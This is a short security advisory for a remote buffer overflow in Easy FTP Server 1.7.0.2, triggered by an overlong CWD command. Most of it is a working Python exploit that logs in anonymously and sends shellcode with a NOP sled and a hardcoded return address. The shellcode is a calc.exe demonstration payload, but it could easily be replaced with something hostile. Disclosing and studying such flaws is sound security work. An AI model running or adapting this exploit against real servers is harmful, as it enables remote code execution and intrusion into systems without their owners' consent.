* Other vulnerabilities covered in bid:38262 *

=== Infos ===

Credit: loneferret

Found: 18/02/10

Versions affected <= 1.7.0.2

=== Description ===

Lack of input length checks for the CWD command result in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker.

=== Workaround ===

Upgrade to the latest version - 1.7.0.12

=== PoC ===

#!/usr/bin/python

import socket, sys

print """

*************************************************

* Easy FTP Server 1.7.0.2 Remote BoF *

* Discovered by: Jon Butler *

* jonbutler88[at]googlemail[dot]com *

*************************************************

"""

if len(sys.argv) != 3:

print "Usage: ./easyftp.py <Target IP> <Port>"

sys.exit(1)

target = sys.argv[1]

port = int(sys.argv[2])

# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)

shellcode = ("\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"

"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"

"\xC7\x93\xC2\x77"

"\xFF\xD1\xEB\xF7")

nopsled = "\x90" * (268 - len(shellcode))

ret = "\x58\xFD\x9A\x00"

payload = nopsled + shellcode + ret # 272 bytes

print "[+] Launching exploit against " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

connect=s.connect((target, port))

print "[+] Connected!"

except:

print "[!] Connection failed!"

sys.exit(0)

s.recv(1024)

s.send('USER anonymous\r\n')

s.recv(1024)

s.send('PASS anonymous\r\n')

s.recv(1024)

# Send payload...

print "[+] Sending payload..."

s.send('CWD ' + payload + '\r\n')

try:

s.recv(1024)

print "[!] Exploit failed..."

except:

print "[+] Exploited ^_^"

[ reply ]